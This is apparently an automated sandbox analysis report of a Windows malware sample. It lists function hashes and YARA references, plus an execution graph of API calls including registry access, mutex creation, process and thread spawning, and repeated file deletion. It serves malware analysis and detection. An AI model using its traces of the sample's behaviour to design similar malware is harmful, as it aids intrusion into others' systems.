                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: d982763427fe2d10e388e547c17d7d891e0a460b2ea4fc2a2a5a438309664ee5
                                                                                                                                                                                                                                            • Instruction ID: f48089dacd1e835c4a5d166172e4a427c6aa3504d4d9954c21f4995502d2367d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d982763427fe2d10e388e547c17d7d891e0a460b2ea4fc2a2a5a438309664ee5
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8701B675A00619CFCB14DF68C884A99B7B1FF48314F1586A9E559AB2A1CB34AC45CFA0
                                                                                                                                                                                                                                            Function 079746C0 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 6fff2936a4cd622109e07c9dc304c6ae8e91ad9b6383d209549c90d624c45bc0
                                                                                                                                                                                                                                            • Instruction ID: ab6a7f532a861272661b7c1c4232729890160ecd878ef2dd63f5e0f4911bf630
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6fff2936a4cd622109e07c9dc304c6ae8e91ad9b6383d209549c90d624c45bc0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 70E026F9710662074E18216D541003B25DF9BC5BE530C403BD505C7390FD64CC05C6A1
                                                                                                                                                                                                                                            Function 0797DE74 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 893e3e9446686b668062a84f4f9ea24c7169fa3a43e2af810fa642bcfb73cda3
                                                                                                                                                                                                                                            • Instruction ID: 5e079abb8f529548c21bd8e1d806f5220f451d6164a3cb8c48e46667edc0bee3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 893e3e9446686b668062a84f4f9ea24c7169fa3a43e2af810fa642bcfb73cda3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CDE026713540005BC208A61E94C887EB7CAEFCE73074044BAF10DC3351CD208C064351
                                                                                                                                                                                                                                            Function 0797FA1A Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 3a92d21bdb5d176d9553c77d6d234c0b2e84a43196c73f0ce6ca0c3dc40e33ba
                                                                                                                                                                                                                                            • Instruction ID: 57a363f969aa44f29a72da0511111efefc579e98f4734745440b45dfb6e0c83b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3a92d21bdb5d176d9553c77d6d234c0b2e84a43196c73f0ce6ca0c3dc40e33ba
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E7E026723481215FC30696ACA8548BDABDADFCA43431940F7E20DDB362C9248C064361
                                                                                                                                                                                                                                            Function 07973DD8 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: a2ffb97214894071b78dcc886ed83f53ada9389192a538f29db0e3d25fc21f0e
                                                                                                                                                                                                                                            • Instruction ID: 3f292f240ce1bebad818220c94b7f95b8feba7546c7bc285796f75747e65ce0d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a2ffb97214894071b78dcc886ed83f53ada9389192a538f29db0e3d25fc21f0e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AAD0A7213092620FC61297BCF8146B96FE28ED20B630C01E7D546DF387C5546C0A47D6
                                                                                                                                                                                                                                            Function 0797D84E Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 10dd17bc1353c99735f7dca9910fca7cf8a9ca29520801ed82339249c2b4cb7c
                                                                                                                                                                                                                                            • Instruction ID: 1919f52eb49284dbd04477ad4ca5839e75a823a72fd6b3bafa810e8af4ace2c3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 10dd17bc1353c99735f7dca9910fca7cf8a9ca29520801ed82339249c2b4cb7c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BAD09279A40109CFCB00CBA4E489AECB7F0FF89319F2441A6D61997221C3716D95CB80
                                                                                                                                                                                                                                            Function 07975C28 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 193e6a5b2ca4ee1558886a8d73c263d8f3cea7e2247207361ba49d1cfdcdec8b
                                                                                                                                                                                                                                            • Instruction ID: 275599f6ea2c3e19541d34a4fae788a99a95f71ef98661e4d8dac73a6e33ab9b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 193e6a5b2ca4ee1558886a8d73c263d8f3cea7e2247207361ba49d1cfdcdec8b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D9D012B0200204CFC708DB28EA85C217BA8FF49708719C5A8E0088F232DB33EC42CAA1

                                                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                                                            Function 0797A1E8 Relevance: 11.0, Strings: 8, Instructions: 997COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: (hq$Hhq$Hhq$Hhq$Hhq$Hhq$Hhq$PHdq
                                                                                                                                                                                                                                            • API String ID: 0-1374958466
                                                                                                                                                                                                                                            • Opcode ID: 0e62d91803d747de4da7efdf62d4c15da8efd67324466f181af0ed3e6882094a
                                                                                                                                                                                                                                            • Instruction ID: f2a721dee42951084e505e0eeafde9d97c426eb475957f0118dcb46214a020a9
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0e62d91803d747de4da7efdf62d4c15da8efd67324466f181af0ed3e6882094a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6C729C717002258FDB58EB78C89466E7BA7FFC8324B148569D50ADB3A5CE34DC06CB91
                                                                                                                                                                                                                                            Function 07974FB0 Relevance: .3, Instructions: 303COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 4c4d7308f81e1018fef549fc4cf2851eadc02b4a67b08afc77d467f8345f1e05
                                                                                                                                                                                                                                            • Instruction ID: 4225b4f61966561163e8ccacb96fda747fa5cfbcc42d34af6feb00d0bf5a3603
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4c4d7308f81e1018fef549fc4cf2851eadc02b4a67b08afc77d467f8345f1e05
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1FA15CB0B101655BDB88FBB8845036F6AEBBFC8254F148568D14ADB3C4DE389D439792
                                                                                                                                                                                                                                            Function 0797BDA8 Relevance: 6.4, Strings: 5, Instructions: 190COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: @$@$B$B$Hhq
                                                                                                                                                                                                                                            • API String ID: 0-3150279512
                                                                                                                                                                                                                                            • Opcode ID: 168075a71d7cb846944eb8a6f7d0fe182bb3b031fa88618190f10451513e78f4
                                                                                                                                                                                                                                            • Instruction ID: 111865fc0109b19355ff939f7e672d0b9a5c835059377ffa7707da9525b04f82
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 168075a71d7cb846944eb8a6f7d0fe182bb3b031fa88618190f10451513e78f4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1951B0F1700216CFC714DF68D88056ABBF6FF89228724856AE519CB761DB30EC46CB91
                                                                                                                                                                                                                                            Function 0797BD98 Relevance: 5.1, Strings: 4, Instructions: 89COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: @$@$B$B
                                                                                                                                                                                                                                            • API String ID: 0-685577651
                                                                                                                                                                                                                                            • Opcode ID: 47d147dff02c15432dc4b5b5280e0ac9709344aec3ec7ba8f1833641a1518c10
                                                                                                                                                                                                                                            • Instruction ID: 2e87c3310ce09eb214370a4a5b7939c35f8374080c2530806df2390b1b71df7b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 47d147dff02c15432dc4b5b5280e0ac9709344aec3ec7ba8f1833641a1518c10
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F8317CF1B006168FCB24CF69C8848AABBB9FF896587154566E205DB361DB30DD44CBC1

                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                            Execution Coverage:1.9%
                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                            Signature Coverage:2%
                                                                                                                                                                                                                                            Total number of Nodes:685
                                                                                                                                                                                                                                            Total number of Limit Nodes:21
                                                                                                                                                                                                                                            execution_graph 46506 446f53 GetLastError 46507 446f6c 46506->46507 46508 446f72 46506->46508 46532 447476 11 API calls 2 library calls 46507->46532 46512 446fc9 SetLastError 46508->46512 46525 448716 46508->46525 46515 446fd2 46512->46515 46513 446f8c 46533 446ad5 20 API calls __dosmaperr 46513->46533 46516 446fa1 46516->46513 46518 446fa8 46516->46518 46535 446d41 20 API calls pre_c_initialization 46518->46535 46519 446f92 46520 446fc0 SetLastError 46519->46520 46520->46515 46522 446fb3 46536 446ad5 20 API calls __dosmaperr 46522->46536 46524 446fb9 46524->46512 46524->46520 46530 448723 _strftime 46525->46530 46526 448763 46538 445364 20 API calls __dosmaperr 46526->46538 46527 44874e RtlAllocateHeap 46528 446f84 46527->46528 46527->46530 46528->46513 46534 4474cc 11 API calls 2 library calls 46528->46534 46530->46526 46530->46527 46537 442210 7 API calls 2 library calls 46530->46537 46532->46508 46533->46519 46534->46516 46535->46522 46536->46524 46537->46530 46538->46528 46539 43a9a8 46542 43a9b4 _swprintf BuildCatchObjectHelperInternal 46539->46542 46540 43a9c2 46555 445364 20 API calls __dosmaperr 46540->46555 46542->46540 46544 43a9ec 46542->46544 46543 43a9c7 pre_c_initialization std::_Locinfo::_Locinfo_dtor 46550 444adc EnterCriticalSection 46544->46550 46546 43a9f7 46551 43aa98 46546->46551 46550->46546 46553 43aaa6 46551->46553 46552 43aa02 46556 43aa1f LeaveCriticalSection std::_Lockit::~_Lockit 46552->46556 46553->46552 46557 448426 36 API calls 2 library calls 46553->46557 46555->46543 46556->46543 46557->46553 46558 4339ce 46559 4339da BuildCatchObjectHelperInternal 46558->46559 46590 4336c3 46559->46590 46561 4339e1 46562 433b34 46561->46562 46566 433a0b 46561->46566 46881 433b54 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 46562->46881 46564 433b3b 46882 4426ce 28 API calls _abort 46564->46882 46574 433a4a ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 46566->46574 46875 4434e1 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 46566->46875 46567 433b41 46883 442680 28 API calls _abort 46567->46883 46570 433a24 46572 433a2a 46570->46572 46876 443485 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 46570->46876 46571 433b49 46575 433aab 46574->46575 46877 43ee04 35 API calls 3 library calls 46574->46877 46601 433c6e 46575->46601 46584 433acd 46584->46564 46585 433ad1 46584->46585 46586 433ada 46585->46586 46879 442671 28 API calls _abort 46585->46879 46880 433852 13 API calls 2 library calls 46586->46880 46589 433ae2 46589->46572 46591 4336cc 46590->46591 46884 433e1a IsProcessorFeaturePresent 46591->46884 46593 4336d8 46885 4379fe 10 API calls 3 library calls 46593->46885 46595 4336dd 46596 4336e1 46595->46596 46886 44336e 46595->46886 46596->46561 46599 4336f8 46599->46561 46895 436060 46601->46895 46603 433c81 GetStartupInfoW 46604 433ab1 46603->46604 46605 443432 46604->46605 46896 44ddd9 46605->46896 46607 44343b 46608 433aba 46607->46608 46900 44e0e3 35 API calls 46607->46900 46610 40d767 46608->46610 46902 41bcf3 LoadLibraryA GetProcAddress 46610->46902 46612 40d783 GetModuleFileNameW 46907 40e168 46612->46907 46614 40d79f 46922 401fbd 46614->46922 46617 401fbd 28 API calls 46618 40d7bd 46617->46618 46926 41afd3 46618->46926 46622 40d7cf 46951 401d8c 46622->46951 46624 40d7d8 46625 40d835 46624->46625 46626 40d7eb 46624->46626 46957 401d64 46625->46957 47150 40e986 90 API calls 46626->47150 46629 40d845 46632 401d64 22 API calls 46629->46632 46630 40d7fd 46631 401d64 22 API calls 46630->46631 46634 40d809 46631->46634 46633 40d864 46632->46633 46962 404cbf 46633->46962 47151 40e937 65 API calls 46634->47151 46636 40d873 46966 405ce6 46636->46966 46639 40d87f 46969 401eef 46639->46969 46640 40d824 47152 40e155 65 API calls 46640->47152 46643 40d88b 46973 401eea 46643->46973 46645 40d894 46647 401eea 11 API calls 46645->46647 46646 401eea 11 API calls 46648 40dc9f 46646->46648 46649 40d89d 46647->46649 46878 433ca4 GetModuleHandleW 46648->46878 46650 401d64 22 API calls 46649->46650 46651 40d8a6 46650->46651 46977 401ebd 46651->46977 46653 40d8b1 46654 401d64 22 API calls 46653->46654 46655 40d8ca 46654->46655 46656 401d64 22 API calls 46655->46656 46658 40d8e5 46656->46658 46657 40d946 46659 401d64 22 API calls 46657->46659 46674 40e134 46657->46674 46658->46657 46981 4085b4 46658->46981 46665 40d95d 46659->46665 46661 40d912 46662 401eef 11 API calls 46661->46662 46663 40d91e 46662->46663 46666 401eea 11 API calls 46663->46666 46664 40d9a4 46988 40bed7 46664->46988 46665->46664 46671 4124b7 3 API calls 46665->46671 46668 40d927 46666->46668 46985 4124b7 RegOpenKeyExA 46668->46985 46669 40d9aa 46670 40d82d 46669->46670 46991 41a473 46669->46991 46670->46646 46676 40d988 46671->46676 47184 412902 30 API calls 46674->47184 46675 40d9c5 46677 40da18 46675->46677 47008 40697b 46675->47008 46676->46664 47153 412902 30 API calls 46676->47153 46680 401d64 22 API calls 46677->46680 46682 40da21 46680->46682 46691 40da32 46682->46691 46692 40da2d 46682->46692 46684 40e14a 47185 4112b5 64 API calls ___scrt_fastfail 46684->47185 46685 40d9e4 47154 40699d 30 API calls 46685->47154 46686 40d9ee 46690 401d64 22 API calls 46686->46690 46699 40d9f7 46690->46699 46696 401d64 22 API calls 46691->46696 47157 4069ba CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 46692->47157 46693 40d9e9 47155 4064d0 97 API calls 46693->47155 46697 40da3b 46696->46697 47012 41ae18 46697->47012 46699->46677 46702 40da13 46699->46702 46700 40da46 47016 401e18 46700->47016 47156 4064d0 97 API calls 46702->47156 46703 40da51 47020 401e13 46703->47020 46706 40da5a 46707 401d64 22 API calls 46706->46707 46708 40da63 46707->46708 46709 401d64 22 API calls 46708->46709 46710 40da7d 46709->46710 46711 401d64 22 API calls 46710->46711 46712 40da97 46711->46712 46713 401d64 22 API calls 46712->46713 46714 40dab0 46713->46714 46716 401d64 22 API calls 46714->46716 46746 40db1d 46714->46746 46715 40db2c 46717 401d64 22 API calls 46715->46717 46722 40dbb1 46715->46722 46719 40dac5 _wcslen 46716->46719 46718 40db3e 46717->46718 46720 401d64 22 API calls 46718->46720 46723 401d64 22 API calls 46719->46723 46719->46746 46724 40db50 46720->46724 46721 40dcaa ___scrt_fastfail 47160 41265d RegOpenKeyExA RegQueryValueExA RegCloseKey 46721->47160 46745 40dbac ___scrt_fastfail 46722->46745 46725 40dae0 46723->46725 46727 401d64 22 API calls 46724->46727 46729 401d64 22 API calls 46725->46729 46728 40db62 46727->46728 46732 401d64 22 API calls 46728->46732 46730 40daf5 46729->46730 47024 40c89e 46730->47024 46731 40dcef 46733 401d64 22 API calls 46731->46733 46734 40db8b 46732->46734 46735 40dd16 46733->46735 46740 401d64 22 API calls 46734->46740 47161 401f66 46735->47161 46738 401e18 11 API calls 46739 40db14 46738->46739 46742 401e13 11 API calls 46739->46742 46743 40db9c 46740->46743 46742->46746 47081 40bc67 46743->47081 46744 40dd25 47165 4126d2 14 API calls 46744->47165 46745->46722 47158 4128a2 31 API calls 46745->47158 46746->46715 46746->46721 46750 40dd3b 46752 401d64 22 API calls 46750->46752 46751 40dc45 ctype 46754 401d64 22 API calls 46751->46754 46753 40dd47 46752->46753 47166 43a5f7 39 API calls _swprintf 46753->47166 46757 40dc5c 46754->46757 46756 40dd54 46758 40dd81 46756->46758 47167 41bec0 86 API calls ___scrt_fastfail 46756->47167 46757->46731 46759 401d64 22 API calls 46757->46759 46764 401f66 28 API calls 46758->46764 46761 40dc7e 46759->46761 46762 41ae18 28 API calls 46761->46762 46766 40dc87 46762->46766 46763 40dd65 CreateThread 46763->46758 47359 41c97f 10 API calls 46763->47359 46765 40dd96 46764->46765 46767 401f66 28 API calls 46765->46767 47159 40e219 109 API calls 46766->47159 46769 40dda5 46767->46769 47168 41a696 79 API calls 46769->47168 46770 40dc8c 46770->46731 46772 40dc93 46770->46772 46772->46670 46773 40ddaa 46774 401d64 22 API calls 46773->46774 46775 40ddb6 46774->46775 46776 401d64 22 API calls 46775->46776 46777 40ddcb 46776->46777 46778 401d64 22 API calls 46777->46778 46779 40ddeb 46778->46779 47169 43a5f7 39 API calls _swprintf 46779->47169 46781 40ddf8 46782 401d64 22 API calls 46781->46782 46783 40de03 46782->46783 46784 401d64 22 API calls 46783->46784 46785 40de14 46784->46785 46786 401d64 22 API calls 46785->46786 46787 40de29 46786->46787 46788 401d64 22 API calls 46787->46788 46789 40de3a 46788->46789 46790 40de41 StrToIntA 46789->46790 47170 409517 142 API calls _wcslen 46790->47170 46792 40de53 46793 401d64 22 API calls 46792->46793 46795 40de5c 46793->46795 46794 40dea1 46797 401d64 22 API calls 46794->46797 46795->46794 47171 43361d 22 API calls 3 library calls 46795->47171 46802 40deb1 46797->46802 46798 40de71 46799 401d64 22 API calls 46798->46799 46800 40de84 46799->46800 46803 40de8b CreateThread 46800->46803 46801 40def9 46805 401d64 22 API calls 46801->46805 46802->46801 47172 43361d 22 API calls 3 library calls 46802->47172 46803->46794 47355 419138 102 API calls __EH_prolog 46803->47355 46810 40df02 46805->46810 46806 40dec6 46807 401d64 22 API calls 46806->46807 46808 40ded8 46807->46808 46813 40dedf CreateThread 46808->46813 46809 40df6c 46811 401d64 22 API calls 46809->46811 46810->46809 46812 401d64 22 API calls 46810->46812 46815 40df75 46811->46815 46814 40df1e 46812->46814 46813->46801 47360 419138 102 API calls __EH_prolog 46813->47360 46817 401d64 22 API calls 46814->46817 46816 40dfba 46815->46816 46819 401d64 22 API calls 46815->46819 47176 41a7b2 29 API calls 46816->47176 46820 40df33 46817->46820 46822 40df8a 46819->46822 47173 40c854 31 API calls 46820->47173 46821 40dfc3 46823 401e18 11 API calls 46821->46823 46827 401d64 22 API calls 46822->46827 46824 40dfce 46823->46824 46826 401e13 11 API calls 46824->46826 46829 40dfd7 CreateThread 46826->46829 46830 40df9f 46827->46830 46828 40df46 46831 401e18 11 API calls 46828->46831 46834 40e004 46829->46834 46835 40dff8 CreateThread 46829->46835 47354 40e54f 82 API calls 46829->47354 47174 43a5f7 39 API calls _swprintf 46830->47174 46833 40df52 46831->46833 46836 401e13 11 API calls 46833->46836 46838 40e019 46834->46838 46839 40e00d CreateThread 46834->46839 46835->46834 47356 410f36 138 API calls 46835->47356 46837 40df5b CreateThread 46836->46837 46837->46809 47357 40196b 49 API calls 46837->47357 46842 40e073 46838->46842 46844 401f66 28 API calls 46838->46844 46839->46838 47358 411524 38 API calls ___scrt_fastfail 46839->47358 46841 40dfac 47175 40b95c 7 API calls 46841->47175 47179 41246e RegOpenKeyExA RegQueryValueExA RegCloseKey 46842->47179 46845 40e046 46844->46845 47177 404c9e 28 API calls 46845->47177 46848 40e08b 46850 40e12a 46848->46850 46852 41ae18 28 API calls 46848->46852 46849 40e053 46851 401f66 28 API calls 46849->46851 47182 40cbac 27 API calls 46850->47182 46853 40e062 46851->46853 46855 40e0a4 46852->46855 47178 41a696 79 API calls 46853->47178 47180 412584 31 API calls 46855->47180 46857 40e12f 47183 413fd4 168 API calls 46857->47183 46858 40e067 46860 401eea 11 API calls 46858->46860 46860->46842 46862 40e0ba 46863 401e13 11 API calls 46862->46863 46866 40e0c5 46863->46866 46864 40e0ed DeleteFileW 46865 40e0f4 46864->46865 46864->46866 46867 41ae18 28 API calls 46865->46867 46866->46864 46866->46865 46868 40e0db Sleep 46866->46868 46869 40e104 46867->46869 46868->46866 47181 41297a RegOpenKeyExW RegDeleteValueW 46869->47181 46871 40e117 46872 401e13 11 API calls 46871->46872 46873 40e121 46872->46873 46874 401e13 11 API calls 46873->46874 46874->46850 46875->46570 46876->46574 46877->46575 46878->46584 46879->46586 46880->46589 46881->46564 46882->46567 46883->46571 46884->46593 46885->46595 46890 44e959 46886->46890 46889 437a27 8 API calls 3 library calls 46889->46596 46893 44e972 46890->46893 46892 4336ea 46892->46599 46892->46889 46894 433d3c 5 API calls ___raise_securityfailure 46893->46894 46894->46892 46895->46603 46897 44ddeb 46896->46897 46898 44dde2 46896->46898 46897->46607 46901 44dcd8 48 API calls 5 library calls 46898->46901 46900->46607 46901->46897 46903 41bd32 LoadLibraryA GetProcAddress 46902->46903 46904 41bd22 GetModuleHandleA GetProcAddress 46902->46904 46905 41bd5b 32 API calls 46903->46905 46906 41bd4b LoadLibraryA GetProcAddress 46903->46906 46904->46903 46905->46612 46906->46905 47186 41a64f FindResourceA 46907->47186 46911 40e192 ctype 47198 401f86 46911->47198 46914 401eef 11 API calls 46915 40e1b8 46914->46915 46916 401eea 11 API calls 46915->46916 46917 40e1c1 46916->46917 46918 43a89c _Yarn 21 API calls 46917->46918 46919 40e1d2 ctype 46918->46919 47202 406052 46919->47202 46921 40e205 46921->46614 46923 401fcc 46922->46923 47212 402501 46923->47212 46925 401fea 46925->46617 46946 41afe6 46926->46946 46927 41b056 46928 401eea 11 API calls 46927->46928 46929 41b088 46928->46929 46931 401eea 11 API calls 46929->46931 46930 41b058 47219 403b60 28 API calls 46930->47219 46933 41b090 46931->46933 46936 401eea 11 API calls 46933->46936 46935 41b064 46937 401eef 11 API calls 46935->46937 46939 40d7c6 46936->46939 46940 41b06d 46937->46940 46938 401eef 11 API calls 46938->46946 46947 40e8bd 46939->46947 46941 401eea 11 API calls 46940->46941 46943 41b075 46941->46943 46942 401eea 11 API calls 46942->46946 47220 41bfb9 28 API calls 46943->47220 46946->46927 46946->46930 46946->46938 46946->46942 47217 403b60 28 API calls 46946->47217 47218 41bfb9 28 API calls 46946->47218 46948 40e8ca 46947->46948 46950 40e8da 46948->46950 47221 40200a 11 API calls 46948->47221 46950->46622 46952 40200a 46951->46952 46956 40203a 46952->46956 47222 402654 11 API calls 46952->47222 46954 40202b 47223 4026ba 11 API calls _Deallocate 46954->47223 46956->46624 46958 401d6c 46957->46958 46959 401d74 46958->46959 47224 401fff 22 API calls 46958->47224 46959->46629 46963 404ccb 46962->46963 47225 402e78 46963->47225 46965 404cee 46965->46636 47234 404bc4 46966->47234 46968 405cf4 46968->46639 46970 401efe 46969->46970 46972 401f0a 46970->46972 47243 4021b9 11 API calls 46970->47243 46972->46643 46974 4021b9 46973->46974 46975 4021e8 46974->46975 47244 40262e 11 API calls _Deallocate 46974->47244 46975->46645 46978 401ec9 46977->46978 46979 401ee4 46978->46979 46980 402325 28 API calls 46978->46980 46979->46653 46980->46979 46982 4085c0 46981->46982 46983 402e78 28 API calls 46982->46983 46984 4085e4 46983->46984 46984->46661 46986 4124e1 RegQueryValueExA RegCloseKey 46985->46986 46987 41250b 46985->46987 46986->46987 46987->46657 47245 401e8f 46988->47245 46990 40bee1 CreateMutexA GetLastError 46990->46669 47247 41b16b 46991->47247 46996 401eef 11 API calls 46997 41a4af 46996->46997 46998 401eea 11 API calls 46997->46998 46999 41a4b7 46998->46999 47000 41a50a 46999->47000 47001 412513 31 API calls 46999->47001 47000->46675 47002 41a4dd 47001->47002 47003 41a4e8 StrToIntA 47002->47003 47004 41a4ff 47003->47004 47005 41a4f6 47003->47005 47007 401eea 11 API calls 47004->47007 47255 41c112 22 API calls 47005->47255 47007->47000 47009 40698f 47008->47009 47010 4124b7 3 API calls 47009->47010 47011 406996 47010->47011 47011->46685 47011->46686 47013 41ae2c 47012->47013 47256 40b027 47013->47256 47015 41ae34 47015->46700 47017 401e27 47016->47017 47019 401e33 47017->47019 47265 402121 11 API calls 47017->47265 47019->46703 47021 402121 47020->47021 47022 402150 47021->47022 47266 402718 11 API calls _Deallocate 47021->47266 47022->46706 47025 40c8ba 47024->47025 47026 40c8da 47025->47026 47027 40c90f 47025->47027 47039 40c8d0 